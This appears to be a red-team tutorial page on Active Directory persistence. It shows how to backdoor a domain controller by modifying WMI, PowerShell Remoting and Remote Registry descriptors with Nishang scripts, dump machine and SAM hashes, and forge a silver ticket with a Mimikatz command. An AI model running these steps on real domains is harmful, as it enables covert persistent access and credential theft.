Modifying Remote Protocol Security Descriptors

This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited.

You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges.

Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin.

Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace

Step 1 - In Component Services, Change the DCOM Permissions of the Computer

Give the user Remote Access permissions

Then give him all Launch and Activation permissions

Step 2 - Modify the WMI Namespace Settings in Computer Management

Give the user full rights over the root WMI namespace

Then make sure those rights apply to all of the child namespaces as well

Step 3 - Check the Access of the Non-Admin User to the DC

PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 14393
RegisteredUser  : Windows User
SerialNumber    : 00377-80000-00000-AA805
Version         : 10.0.14393

Now our user can execute commands on the DC.

Giving a User Access to WMI From Powershell

With Set-RemoteWMI.ps1 (from Nishang)

. .\Set-RemoteWMI.ps1

Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose [-Credential <Domain Admin>]

Then login as that user and check the access:

Get-WmiObject -Class win32_operatingsystem -ComputerName <dc>

To Remove the Modified Descriptor

Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose -Remove [-Credential <Domain Admin>]

Change the Powershell Remoting Descriptors

With Set-RemotePSRemoting.ps1 (from Nishang)

Set-RemotePSRemoting -UserName <user> -ComputerName <dc> -Verbose

Then Execute Commands Remotely on the DC

Invoke-Command -ComputerName <dc> -ScriptBlock {<command>}

Changing the Remote Registry to Add a Backdoor and Retrieve Hashes

Step 1 - With Add-RemoteRegBackdoor.ps1

. .\Add-RemoteRegBackdoor.ps1

Add-RemoteRegBackdoor -ComputerName <dc> -Trustee <user>

Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1

# Get the DC Machine Hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Dump the Local SAM Hashes
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

Step 3 - Exploit

With the DC hash we can create Silver Tickets.

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<target-domain> /service:<service> /rc4:<service-acct-or-computer-hash> /user:Administrator /ptt"'

With the Local Administrator hash we can DCSync or take advantage of the local Administrator hash being the DSRM password.

PreviousDirectory Services Restore Mode (DSRM)NextGolden Tickets

Last updated 3 years ago

hashtagModifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace

hashtagStep 1 - In Component Services, Change the DCOM Permissions of the Computer

hashtagStep 2 - Modify the WMI Namespace Settings in Computer Management

hashtagStep 3 - Check the Access of the Non-Admin User to the DC

hashtagGiving a User Access to WMI From Powershell

hashtagWith Set-RemoteWMI.ps1 (from Nishang)

hashtagTo Remove the Modified Descriptor

hashtagChange the Powershell Remoting Descriptors

hashtagWith Set-RemotePSRemoting.ps1 (from Nishang)

hashtagThen Execute Commands Remotely on the DC

hashtagChanging the Remote Registry to Add a Backdoor and Retrieve Hashes

hashtagStep 1 - With Add-RemoteRegBackdoor.ps1

hashtagStep 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1

hashtagStep 3 - Exploit